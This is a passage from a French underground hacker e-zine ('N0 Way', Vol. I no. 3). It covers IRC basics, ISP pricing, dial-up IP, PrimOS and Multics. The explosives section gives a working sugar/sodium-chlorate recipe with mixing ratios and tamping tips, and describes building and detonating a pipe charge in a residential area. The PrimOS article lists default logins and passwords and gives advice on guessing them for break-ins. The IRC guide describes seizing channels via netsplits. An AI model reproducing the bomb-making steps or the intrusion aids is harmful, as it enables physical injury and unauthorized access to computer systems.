tant que connecte. Si vous prenez un serveur irc trop loin (comptez la
|
||
"distance" avec traceroute), vous aurez des delais dans votre dialogue.
|
||
Il vous faut aussi et bien sur un acces Internet.
|
||
Une fois que vous aurez fix‚ tout cela, vous pourrez vous connecter sur IRC.
|
||
|
||
Comment utiliser?
|
||
- - - - - - - - -
|
||
Les commandes IRC sont assez simple. Je vous conseille de prendre un
|
||
client IRC II car ils permettent vraiment des choses tres cool. Ils vous
|
||
permettent par exemple de faire du transfert de fichier avec quelqu'un en
|
||
restant connecte sur le chat et en continuant de discuter.
|
||
On change son nickname (pseudo) avec: /NICK <nouveau nickname>
|
||
On va dans un channel en faisant: /join #<nom du channel>
|
||
Les noms de channels commencent toujours par #
|
||
On quitte un channel en faisait: /leave <channel>
|
||
On sort du client en faisant: /exit
|
||
On envoie un message prive non securise … quelqu'un: /msg <nickname> <message>
|
||
On regarde qui il y a dans le channel avec: /who #<channel>
|
||
voila les commandes de base.
|
||
|
||
Explication du fonctionnement du reseau IRC.
|
||
- - - - - - - - - - - - - - - - - - - - - -
|
||
On utilise l'IRC avec un client qui se connecte … un serveur IRC.
|
||
Ce serveur IRC est connecte … d'autres serveurs IRC. Ainsi, il y a un traffic
|
||
moins important car l'information est distribuee sur les serveurs IRC. Si
|
||
chacun choisit un serveur IRC proche de chez lui (pas beaucoup de internet hop,
|
||
les saut de puces que l'on voit avec traceroute), les liaisons internationales
|
||
ne seront utilis‚es que par les serveurs et donc pas de gaspillage!
|
||
|
||
Ainsi on aura:
|
||
Client Client Client
|
||
Client__ | `\ |
|
||
`\ | `\ |
|
||
`\ | `\ |
|
||
Client----IrcServ3==========IrcServ4=====IrcServ5-----Client
|
||
|| \
|
||
|| \
|
||
|| \
|
||
Client----IrcServ2==========IrcServ1 Client
|
||
| |
|
||
| |
|
||
Client Client
|
||
|
||
Si il y une coupure reseau entre IrcServ1 et IrcServ2 le user connecte sur
|
||
IrcServ1 n'aura plus qu'a quitter et revenir dans le channel en question et
|
||
des a present il aura les chanops sur le reseau car IrcServ1 croit alors qu'il
|
||
est tout seul dans le reseau puisqu'il ne voit pas les autres au dela de la
|
||
coupure reseau (que l'on appelle netsplit).
|
||
Ainsi, des que la connection entre IrcServ 1 et 2 reviendra, le Client de
|
||
IrcServ 1 sera chanop et le restera : il sera devenu chanops.
|
||
Donc le jeu est pour certain de devenir chanop et de faire "tomber" la liaison
|
||
entre son serveur local et le serveur qui fournit le feed IRC a son serveur
|
||
local. Je sais, c'est vicieux mais a la fin ca n'a plus d'interet tant c'est
|
||
commun sur Irc.
|
||
|
||
Au niveau des chanops, il faut savoir que le premier qui se connecte
|
||
dans un channel deviens automatiquement le maitre du channel avec ses chanops.
|
||
Il peut ainsi:
|
||
- ejecter quelqu'un du channel (/kick <nickname>)
|
||
- modifier le sujet (topic) du channel (/topic #<channel> <new topic>)
|
||
- rendre operateur quelqu'un d'autre (/mode +o <nickname>)
|
||
- enlever l'operateur … quelqu'un (/mode -o <nickname>)
|
||
- modifier les droits d'acces au channel (on peut banir du channel certainnes
|
||
personnes, certainnes adresses etc...)
|
||
|
||
Quelques conseils:
|
||
- - - - - - - - -
|
||
Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez
|
||
pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera
|
||
executer des choses qui peuvent ˆtre des backdoor pour revenir sur votre suite
|
||
ensuite.
|
||
Evitez de faire chier les personnes avec un @ devant leur nom, ce sont
|
||
les chanops!
|
||
Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien
|
||
qu'il ne contient pas de backdoor!
|
||
|
||
Voila !
|
||
- - - -
|
||
Vous voila prˆt pour aborder l'IRC sans difficult‚! Attention, on
|
||
devient vite accro a ce service de l'internet.
|
||
Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm)
|
||
"y a t'il une vie aprŠs l'IRC?"
|
||
|
||
++NeurAlien.
|
||
|
||
| Internet for the masses |
|
||
|
||
La France ‚tait (JE DIS BIEN ETAIT) s‚rieusement dans la merde car
|
||
aucun acces public … l'Internet n'‚tait disponible … des prix abordables.
|
||
Bien sur il y avait des passes droits accord‚s … certains privil‚gi‚ qui
|
||
b‚n‚ficiaient de l'acces d'un universit‚ ou d'un institut pour utiliser
|
||
Internet.
|
||
|
||
Depuis quelques mois, il semble que tout ait un peu chang‚.
|
||
Il est apparu d'abord des services minitels proposant mail et news. Bien sur,
|
||
ce genre de service est une vraie arnaque car il ne fournit pas quelque chose
|
||
d'agr‚able (vous avez deja les news a 1200/75 bauds????). De plus, ils se
|
||
sont avere de qualit‚ assez m‚diocre. Pour n'en citer que quelques uns, ya
|
||
TEASER et sa flopp‚e de services parallŠle destin‚ … se faire du fric sans se
|
||
pr‚ocupper des connect‚s (Sniifff Sniiff... mais oui, je reconnais cette odeur
|
||
de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services
|
||
EMAIL, INTERNET etc...
|
||
|
||
Ensuite ya des trucs largement plus serieux qui se sont mont‚. On a
|
||
tout d'abord entendu parler de boites qui voulaient faire du dialup IP.
|
||
Ma premiŠre r‚action a ‚t‚:
|
||
"Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces
|
||
derniere place de libert‚ qu'est l'Internet".
|
||
|
||
Alors on a vu apparaitre en premier un truc appel‚ World-Net. Ne
|
||
voulant pas juger … la l‚gŠre, j'ai demand‚ des infos et voila:
|
||
80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...)
|
||
40 F de l'heure pour le Mail, News et IRC.
|
||
Je me suis dit:
|
||
"arghhh... putain c'est cher"
|
||
Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait.
|
||
Au mois de Juin et Juillet d'autres boites se sont fait connaitre:
|
||
>FranceNet qui fait passer son service pour de l'internet alors que c'est juste
|
||
un BBS connect‚ … l'internet qui ne permet pas de faire reellement du Dialup
|
||
IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son
|
||
clavier. En plus c'est hyper cher (36 68) et ca fonctionne trŠs mal!
|
||
>Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en
|
||
parler. C'est la pourriture Calvacom revue et corrigee pour Internet.
|
||
>France Telecom et leur service internet: si vous avez plus de 10 000 F par
|
||
mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la,
|
||
vous pouvez toujours tenter.
|
||
J'ai rarement vu une boite qui ait le culot de faire cela quand meme! C'est
|
||
une honte !
|
||
|
||
Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT,
|
||
c'est bien WorldNet qui est le moins cher.
|
||
|
||
Alors je recapitule les infos que j'ai eu sur eux (worldnet):
|
||
>Pas d'abonnement.
|
||
>Pour le Full IP : 80 F HT / heure
|
||
>Pour le Mail, News et IRC: 40 F / heure
|
||
pas d'autre frais. pas de frais … la mise en place. Ils peuvent fournir un
|
||
package de communication pour PC ou Mac.
|
||
|
||
Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est
|
||
pas mal quand meme.
|
||
|
||
Voila, j'espere que ca vous ‚vitera de vous faire pieger. J'ai des potes
|
||
pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de
|
||
Francenet. Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et
|
||
quand tu recois la facture FT, il est deja trop tard !
|
||
|
||
Amusez vous bien avec Internet. ++NeurAlien.
|
||
|
||
P.S: J'ai une information tres tres tres interressante.
|
||
WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe
|
||
qui le demandant. C'est trop cool. Je me rappelle plus de la date mais
|
||
ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le
|
||
3617 SCT je crois.
|
||
Je met les coordonn‚es de t‚l‚phone de cette boite:
|
||
Tel: (1) 60 20 85 14
|
||
Hehe... moi c'est sur, je vais demander un compte pour ce truc !
|
||
|
||
Disclaimer:
|
||
J'en ai rien a foutre si mes propos font chier certainnes des boites
|
||
mentionn‚es (francenet, WorldNet, Calvanet, France Telecom, teaser
|
||
etc...). Ce que j'ai dit est vrai et si ca vous plait pas vous avez
|
||
qu'a ˆtre honnŠtes vous aussi. Je ne suis pas un politicien donc j'en
|
||
ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et
|
||
ceci n'est pas un journal alors les proces en diffamations vous pouvez
|
||
vous les mettre ou je pense.
|
||
A bon entendeur salut! ++NeurAlien.
|
||
|
||
| Dialup IP |
|
||
|
||
Vous entendez parler partout de Dialup IP et vous ne savez pas ce que
|
||
ca veut dire. Cette partie est sens‚e vous expliker cela!
|
||
|
||
Dans le temps, avant qu'Internet soit populaire, un vieux systŠme
|
||
appel‚ UUCP permettait de recevoir son mail et ses news par "… coups" car il
|
||
fallait aller chercher ses informations sur le serveur et consulter en local.
|
||
|
||
Ensuite on a vu apparaitre pour les privil‚gi‚ des accŠs shell sur des
|
||
becannes reli‚es … l'Internet. A partir de la, on avait un terminal qui
|
||
permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet:
|
||
telnet, FTP, IRC, gopher. Mais ca s'est vite trouv‚ d‚pass‚. Par exemple, le
|
||
World Wide Websted (WWW) qui est un ensemble de serveurs multim‚dias reli‚s
|
||
par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner
|
||
qu'avec un terminal ayant des capacite graphiques et sonores. Ce que
|
||
generalement les terminaux n'ont pas!
|
||
|
||
Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP
|
||
ont ‚t‚ cr‚‚. Au lieu de se connecter avec un ‚mulateur de terminal sur un
|
||
unix et de converser avec un Shell, la politique du SLIP & PPP est de
|
||
transformer le flux de paquet venant de l'Internet en quelque chose que l'on
|
||
peut passer sur le lien s‚rie du modem.
|
||
|
||
Donc PPP et SLIP servent … ‚muler en fait une liaison TCP/IP
|
||
(protocole Internet) sur une communication modem. Bien sur, cette liaison
|
||
n'est pas permanente.
|
||
|
||
Ainsi, on considŠre la machine de l'utilisateur comme un noeud
|
||
temporaire d'un reseau connect‚ … Internet. Cette machine (qui peut ˆtre la
|
||
votre) possŠde donc sa propre adresse. Il faut pour gerer ce flux de paquet
|
||
qui transite … travers le modem un "Client" PPP ou SLIP qui retransforme ca en
|
||
quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW),
|
||
Telnet, FTP, Gopher, Mail, News.
|
||
(Le terme client d‚signe un programme qui va traiter l'information dispens‚e
|
||
par un serveur centralis‚).
|
||
|
||
Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu
|
||
comme la victoire du combat qui se d‚roule sur le cable TV.
|
||
Les grosses compagnies veulent un systŠme peu interactif qui permettra
|
||
seulement d'acheter avec son num‚ro de CB des programmes … la t‚l‚.
|
||
Les cyberpunks veulent un truc totalement interactif qui permet de proposer
|
||
soi mˆme ses propres service. SLIP et PPP vous permettent de proposer vos
|
||
propres services … l'ensemble du monde. Bien sur ces services sont
|
||
accessibles uniquement quand vous etes connect‚.
|
||
|
||
Exemple pratique: emulation SLIP sous Windows.
|
||
Vous avez un PC.
|
||
Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!).
|
||
Vous avez les logiciels Trumpet et WinSock.
|
||
Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc...
|
||
|
||
Trumpet est le logiciel qui vous permet de vous connecter … un service vous
|
||
fournissant du SLIP.
|
||
WinSock permet d'‚muler les sockets ("systeme de communication d'Internet"
|
||
(c'est pas exactement ca)) sous Windows.
|
||
Les clients exploitent les infos transmises par Trumpet puis WinSock.
|
||
|
||
sch‚ma:
|
||
|
||
____________________________________________
|
||
| Client | Client | Client | Client | Client |
|
||
| Mail | FTP | Mosaic | News | Irc |
|
||
|(eudora)| | | | |
|
||
|--------+--------+--------+--------+--------|
|
||
| |
|
||
| WinSock |
|
||
| ( transforme les infos fournie par Trumpet |
|
||
| en sockets exploitable par les clients ) |
|
||
|--------------------------------------------|
|
||
| |
|
||
| Trumpett |
|
||
| ( assure la cnx SLIP et la reception des |
|
||
| paquets TCP/IP ) |
|
||
|--------------------------------------------|
|
||
| |
|
||
| couche Hard |
|
||
| communication modem en s‚rie |
|
||
| |
|
||
--------------------------------------------
|
||
|
||
L'avantage avec ce systŠme est que l'on peut utiliser plusieurs
|
||
clients en mˆme temps: FTP, News et Mosaic par exemple.
|
||
|
||
C'est TRES TRES pratique.
|
||
|
||
Eh bien c'est sur ces mots que je referme la section "du cot‚ d'internet".
|
||
|
||
++NeurAlien
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.14
|
||
|
||
|
||
[ Petite pr‚cision sur les explosifs:
|
||
Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
|
||
Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
|
||
QUOI ! On ne maitrise jamais totalement ce genre de produit (mˆme les
|
||
artificiers professionels).
|
||
Un explosif amateur a un probleme: il n'est presque jamais stable, par contre
|
||
il est en g‚n‚ral aussi fort que les explosifs professionels. Donc, il faut que
|
||
vous sachiez que chaque ann‚e il y a entre 10 et 100 gosse qui garderont a vie
|
||
des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
|
||
des gants car sinon c'est vraiment pas beau!).
|
||
DECONNEZ PAS, faites vos m‚langes en petite quantit‚ et n'oubliez pas:
|
||
ce genre de m‚lange peut ˆtre MORTEL ! ++NeurAlien.]
|
||
-----------
|
||
|
||
L'explosif ? tient tient...
|
||
|
||
|
||
Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de
|
||
desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les
|
||
paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni
|
||
perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les
|
||
ingredients...
|
||
|
||
Premiere preparation, quelques grammes, moitier sucre, moitier chlorate.
|
||
J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement
|
||
lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee
|
||
blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est
|
||
en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que
|
||
bruler a l'air libre. On dit que le compose fuse.
|
||
|
||
Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube.
|
||
J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de
|
||
l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait
|
||
placer un projectile qui entrait dans le tube. Lorsque le petard claquait le
|
||
projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une
|
||
force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur
|
||
il me fallut peu de temps pour remplacer les Mammouths par le melange. J'avais
|
||
tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du
|
||
tube laissait passer une meche de petard, ce qui declancherais l'explosion
|
||
J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le
|
||
fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu'
|
||
avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si
|
||
peu de poudre...
|
||
|
||
Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de
|
||
physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.
|
||
|
||
En voici les resultats:
|
||
|
||
Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et
|
||
1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui
|
||
reste apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu
|
||
trop de chlorate. Reste noir bousoufle -> trop de sucre. Ce melange augemente
|
||
ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre
|
||
coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du
|
||
fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro
|
||
contiennent de l'huile de vaseline, mais cette operation est delicate a
|
||
realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres
|
||
important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire,
|
||
n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant
|
||
meme d'avoir dit 'ouf..'
|
||
|
||
Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le
|
||
melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca
|
||
demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc
|
||
provoque un petit echauffement en un point, meme tres faible), donc attention
|
||
!!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours
|
||
du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou
|
||
peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une solution
|
||
pour en garder consiste a humudifier le melange, et le stocker dans un
|
||
congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.
|
||
|
||
Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes
|
||
de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la
|
||
presse prealablement percer pour laisser passer une meche. -----> Ne percer pas
|
||
apres avoir mis le melange et fo prendre la precaution de mettre du papier
|
||
mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le
|
||
melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete
|
||
depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une
|
||
plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De
|
||
toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas
|
||
comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit
|
||
j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm
|
||
d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait
|
||
pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave,
|
||
un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus
|
||
grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le
|
||
representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation
|
||
une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un
|
||
attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a
|
||
ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.
|
||
|
||
|
||
C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai
|
||
transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue
|
||
Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le
|
||
courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on
|
||
a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut
|
||
refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.
|
||
|
||
|
||
A bon entendeur, salut !...
|
||
By Inlandsis.
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.15
|
||
|
||
|
||
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
||
diffuse publiquement.
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
= CORE-DUMP Issue 1 Phile 3 [NeurAlien] 13/01/92 =
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
/@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\
|
||
@/ \@
|
||
@ Prime & the PrimOS Environment @
|
||
@ @
|
||
@ par @
|
||
@ @
|
||
@ NeurAlien @
|
||
@\ /@
|
||
\@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/
|
||
|
||
|
||
Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de
|
||
traitement lourd et l'ordinateur de gestion de conception plus legere.
|
||
Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire.
|
||
Il est multi-utilisateur et possede plusieurs modules des l'origine:
|
||
un module Basic, un autre de programmation pseudo-shell (batch) etc...
|
||
Le prime possede de nombreuses failles de securite. Notemment dans le
|
||
programme tour.
|
||
|
||
>L'acces au Prime:
|
||
=================
|
||
L'acces au Prime se fait par une base d'acces d'o— l'on peut lancer des
|
||
commandes de pre-login appelee PrimeNet. C'est en fait comme un service
|
||
d'accueil et de dispatching avec une machine par defaut.
|
||
Les prompts utilis‚ par le systŠme de pr‚login sont 'OK' et 'ER!'.
|
||
'OK' est affich‚ en premier, si vous tapez quelque chose d'incorrect, le Prime
|
||
vous r‚pondra par un 'ER!'.
|
||
La banniŠre ressemble a :
|
||
"Primenet V2.3"
|
||
Un message souvent vu sur Prime est:
|
||
Please Login
|
||
ER!
|
||
|
||
Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper
|
||
login:
|
||
|
||
Primenet V 2.3 (system)
|
||
LOGIN<CR> (vous)
|
||
User id? (system)
|
||
AA1234 (vous)
|
||
Password? (system)
|
||
KILLME (vous)
|
||
OK, (system)
|
||
|
||
La principale commande etant bien s–r login.
|
||
syntaxe: login [<user>] [<password>] [-ON <host>] [-PROJECT <project_id>]
|
||
Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS
|
||
d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger
|
||
sur une machine autre que celle par defaut sans pour autant avoir a se logger
|
||
sur la machine par defaut.
|
||
|
||
Il vaut mieux essayer plusieurs logins par la commande
|
||
login <user> <password>
|
||
comme ca vous avez 3 essais au lieu d'un essai.
|
||
|
||
>Le systeme d'exploitation du Prime, PrimOS:
|
||
===========================================
|
||
La version actuelle de PrimOS doit etre la 22 ou la 23.
|
||
|
||
>Les commandes d'utilisation courante du systeme:
|
||
================================================
|
||
status users \_ : Affiche la liste des users, leur origine, leur etat
|
||
us /
|
||
all \_ : Affiche des infos sur toutes les activites du
|
||
al / systeme
|
||
comm : decrit les controlleurs de communication et leurs
|
||
etats respectifs.
|
||
devices : donne des informations sur les peripheriques
|
||
disks \_ : donne des informations sur les disques
|
||
di /
|
||
me : donne des infos sur soi meme.
|
||
network \_ : donne des infos sur les differents noeuds du reseau
|
||
net / PrimeNet.
|
||
project \_ : donne des infos sur les projets sur users
|
||
pro /
|
||
system \_ : donne des infos sur le PrimOS en train de tourner.
|
||
sys /
|
||
semaphores \_ : donnes des infos sur les semaphores actives
|
||
se /
|
||
units \_ : donne des infos sur les units ouverts
|
||
un /
|
||
|
||
listf \_ : donne le nom du dir, le peripherique et si on a des
|
||
l / ACLs dessus ou non.
|
||
|
||
slist <pathname> : affiche le fichier a l'ecran
|
||
|
||
login [<user>] [<password>] [-ON <host>] [-PROJET <projet_id>]
|
||
: ouvre un log sur la machine specifiee ou definie par
|
||
defaut avec le password et le projet specifie ou par
|
||
defaut.
|
||
|
||
date : affiche la date et l'heure
|
||
|
||
time : affiche les valeurs du registre de temps partage:
|
||
. connect time : temps depuis le login
|
||
. compute time : temps d'utilisation de
|
||
programmes
|
||
. I/O : temps d'utilisation d'un
|
||
Disk, Controlleur de comm ou
|
||
Device.
|
||
|
||
|
||
>Les communications:
|
||
===================
|
||
Les communications x25 se font par l'intermediaire de netlink qui est un
|
||
programme de communication.
|
||
on l'appelle comme suit:
|
||
netlink<cr>
|
||
Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'.
|
||
Ici vous pouvez tapper diverses commandes:
|
||
c <DNIC>:<NUA> : appelle en collective call le NUA
|
||
nc <DNIC>:<NUA> : appelle normalement le NUA
|
||
|
||
>Les logins par defaut:
|
||
======================
|
||
User ids: Passwords:
|
||
--------- ----------
|
||
Admin
|
||
Games
|
||
Tools
|
||
Rje
|
||
Netman
|
||
Cmdnco
|
||
Demo
|
||
Regist
|
||
Prirun
|
||
Telenet
|
||
mail mail
|
||
prime prime / primos
|
||
primos_cs prime / primos
|
||
Primos
|
||
primenet primnet
|
||
mfd mfd
|
||
fam fam / Ver. 18 Primos \
|
||
system system < et en dessous >
|
||
dos dos \ --------- /
|
||
tele tele
|
||
netlink netlink
|
||
test test
|
||
guest guest
|
||
guest1 guest1/guest
|
||
|
||
>le mot de la fin:
|
||
=================
|
||
Ya pas mal de systŠme Prime qui sont encore TRES ouverts … tout type de
|
||
p‚n‚trations (hahaha). Alors pour les bons petits PADs tranquile, c'est kewl!
|
||
NeurAlien.
|
||
------------------
|
||
S0, G0 0N wif N0 Way !
|
||
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.16
|
||
|
||
|
||
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
|
||
</' `\>
|
||
<\ Rave Revolt />
|
||
<\ \>
|
||
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
|
||
|
||
-
|
||
PART I
|
||
-
|
||
|
||
Arggghhhhhhh!!!!! C'est le cri de la bete qui se reveille!
|
||
|
||
NON, je n'y crois pas, ce que je redoutais est arriv‚: ce havre de repos
|
||
qu'etait le pont de Tolbiac a ete viol‚. Le sanctuaire a ‚t‚ profan‚ par de
|
||
sales CRS baveux et grognants avides de baston. C'est vraiment le genre de
|
||
trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers
|
||
simplement car c'‚tait pas d‚clar‚. Encore cet encul‚ de Pasqua qui s'est
|
||
dit: "Hey merde, ils s'amusent bien l… bas et ils sont pas emmerd‚s par les
|
||
flics car ils ne gˆnent personne".
|
||
|
||
Solution: hop, on se renseigne avec les RG et autres encul‚s civils puis on
|
||
leur envoie les CRS.
|
||
|
||
Bravo pour les m‚thodes... C'est d'une finesse....
|
||
|
||
Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a
|
||
d‚ranger les afters: RI-DI-CULES !
|
||
|
||
Il paraitrait mˆme qu'il est question d'interdire les raves au plan national.
|
||
La va falloir se secouer car les raisonnements pr‚c‚dents ne peuvent plus
|
||
s'appliquer: on pensait que l'interdictions des raves commerciales permettrait
|
||
… l'underground de se developper. Que nenni, ils s'attaquent directement …
|
||
l'underground!
|
||
|
||
Quelle sera la prochaine ‚tape?
|
||
|
||
L'interdiction de TNT?
|
||
L'arrestation des organisateurs des raves?
|
||
(ca serait pas un mal pour E+ et d'autres...)
|
||
|
||
Il va falloir r‚agir contre toutes ces pouss‚es s‚curitaires et anti-
|
||
d‚mocratiques. Nous y contribuons d‚ja en diffusant No Way un peu partout!
|
||
|
||
-
|
||
PART II
|
||
-
|
||
|
||
Le Teknival UFO 23 du massif central a lui aussi ‚t‚ gŠn‚ par les keufs
|
||
une nouvelle fois.
|
||
|
||
Au d‚but, tout se passait bien: le Teknival avait ‚t‚ install‚ dans un
|
||
champ prŠt‚ aux organisateurs par un agriculteur du coins.
|
||
|
||
Tout se passait bien, a des kilometres des habitations. Pourtant, il y
|
||
a eu DES PLAINTES. Les gendarmes venaient … l'entr‚e du champs presque tous
|
||
les jours pour se renseigner auprŠs des organisateurs. Le maire voulait virer
|
||
le teknival de sa commune. Le maire biensur n'y est pas arriv‚. Ils ont donc
|
||
transmis l'affaire au prefet etc... Bref, comment faire chier pour rien les
|
||
ravers qui ne g‚naient personne.
|
||
|
||
On se balade dans le Teknival, a la recherche de bois pour le feu ou de
|
||
feu pour nos tˆtes ;) et … chaque fois on entendait:
|
||
"Il parait qu'ils vont envoyer les CRS".
|
||
|
||
De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre
|
||
ces personnes mal avis‚es se sotn permise de filtrer … la fin du Teknival
|
||
l'entr‚e au champ, ne laissant pas entrer les gens mais les laissant sortir.
|
||
Le champs s'est ainsi "vid‚" au fur et … mesur des voyages.
|
||
|
||
La mˆme ‚ternelle question se pose encore,
|
||
|
||
Mais que veulent ils?
|
||
++N.
|
||
|
||
-%!% N0 Way %!%-
|
||
|
||
Volume I, Num‚ro 3, Partie 3.17
|
||
|
||
|
||
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
||
diffuse publiquement.
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
= CORE-DUMP Issue 1 Phile 5 [NeurAlien] 14/01/92 =
|
||
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||
|
||
|
||
$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$
|
||
$$ $$
|
||
$$ Multics par NeurAlien $$
|
||
$$ $$
|
||
$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$œ$
|
||
|
||
|
||
Multics est encore un de ces OS depasses, vieux, obsoletes mais encore
|
||
vivant sur quelques coins retires, hameaux eloignes et ruraux de la
|
||
technopolis galopante que sont actuellement nos grands centre informatiques.
|
||
Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de
|
||
Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui
|
||
a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France.
|
||
(et puis aussi: Le ministere de la Culture et l'INRA.)
|
||
Multics est la source d'Unix. C'est un peu comme le pere d'Unix.
|
||
C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite,
|
||
d'une organisation et d'une praticite telle que l'on se demande pourquoi
|
||
cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS
|
||
developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete
|
||
temoins est la 12.0 je crois.
|
||
|
||
